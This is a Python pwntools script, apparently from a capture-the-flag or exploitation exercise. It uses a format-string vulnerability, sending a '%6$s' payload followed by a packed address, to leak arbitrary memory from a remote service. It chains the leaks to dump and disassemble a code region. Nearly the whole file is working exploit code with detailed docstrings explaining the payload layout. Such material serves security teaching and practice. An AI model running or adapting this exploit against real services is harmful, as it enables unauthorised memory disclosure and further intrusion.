#!/usr/bin/python
import binascii
import pwn
import sys
# Endpoint of the vulnerable service the leak is run against (default: a
# local instance on the port the original target listened on).
RHOST, RPORT = "localhost", 54514
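def leakStringAt(s, address):
    """Leak the NUL-terminated string at *address* via a ``%6$s`` format-string read.

    The payload sent is ``%6$s`` + ``AAAA`` + p64(address).  ``%6$s`` makes the
    vulnerable printf dereference its 6th vararg as a char*; on the original
    target that slot presumably lines up with the start of our own input on
    the stack, i.e. the appended pointer (TODO confirm: the index 6 is
    target-specific and must be re-derived for any other binary).  The
    pointer goes last because its high bytes are NUL and would otherwise
    terminate the format string before the ``%6$s``.  The literal ``AAAA``
    echoed back by printf is the marker that separates the leaked bytes from
    the rest of the reply.

    Args:
        s: a pwntools tube providing ``sendline`` and ``recv``.
        address: absolute address to read from.

    Returns:
        The leaked bytes up to (not including) the first NUL, or ``None`` if
        the target closed the connection while we waited for the reply
        (typically a crash from reading an unmapped address).

    Raises:
        EOFError: the tube was already closed when the payload was sent.
        ValueError: the reply did not contain the ``AAAA`` marker (the
            reply was consumed but cannot be attributed to *address*).

    NOTE(review): ``recv()`` returns whatever has arrived so far, so a reply
    split across packets could hide the marker; ``recvuntil`` on the marker
    would be more robust -- not changed here to keep the tube API surface
    the same as the original.
    """
    payload = b"%6$sAAAA" + pwn.p64(address)
    # An EOFError here (connection already gone) simply propagates.
    s.sendline(payload)
    try:
        # BUG FIX: the original read from the module-level global ``p``
        # instead of the tube it was handed.
        reply = s.recv()
    except EOFError:
        print(" [X] EOFError trying to leak from %x" % address)
        return None
    # partition() takes the bytes before the first marker; the original
    # two-way unpack of split() raised ValueError whenever the marker was
    # missing or occurred more than once.
    leaked, marker, _tail = reply.partition(b"AAAA")
    if not marker:
        raise ValueError("no AAAA marker in reply for %x: %r" % (address, reply))
    print(" [R] leaked %d bytes" % len(leaked))
    return leaked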
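def leakBlock(s, address, size):
    """Leak *size* bytes starting at *address* by chaining ``%s`` string leaks.

    Each ``leakStringAt`` call stops at the first NUL byte, so after every
    chunk the NUL is re-inserted into the output and the next read starts
    just past it.  Leaking an empty string therefore still advances by one
    byte (the NUL itself).

    Args:
        s: pwntools tube, passed through to ``leakStringAt``.
        address: start address of the region.
        size: number of bytes wanted.

    Returns:
        A ``bytearray`` of at most ``size`` bytes.  It is shorter than
        ``size`` only if the connection died part-way through (EOF on send,
        or ``leakStringAt`` returning ``None``); in that case the bytes
        returned are still contiguous from *address*.  The original skipped
        a byte on a failed leak without emitting anything, which silently
        misaligned everything after it, and it could also return more than
        ``size`` bytes when the last string overran the end.
    """
    out = bytearray()
    while len(out) < size:
        # len(out) is the current offset into the region.
        try:
            chunk = leakStringAt(s, address + len(out))
        except EOFError:
            break  # tube closed: return what we have rather than misalign
        if chunk is None:
            break
        out += chunk
        out.append(0)  # the NUL that terminated this %s read
    return out[:size]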
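if __name__ == "__main__":
    # Region to dump and disassemble.  0x400696 looks like a fixed .text
    # address of the original (presumably non-PIE) x86-64 target -- TODO
    # adapt for any other binary.
    LEAK_ADDR = 0x400696
    LEAK_SIZE = 0x100
    p = pwn.remote(RHOST, RPORT)
    try:
        data = leakBlock(p, LEAK_ADDR, LEAK_SIZE)
        print(pwn.disasm(bytes(data), arch='amd64'))
    finally:
        # Always release the socket, even if the leak aborts with an exception.
        p.close()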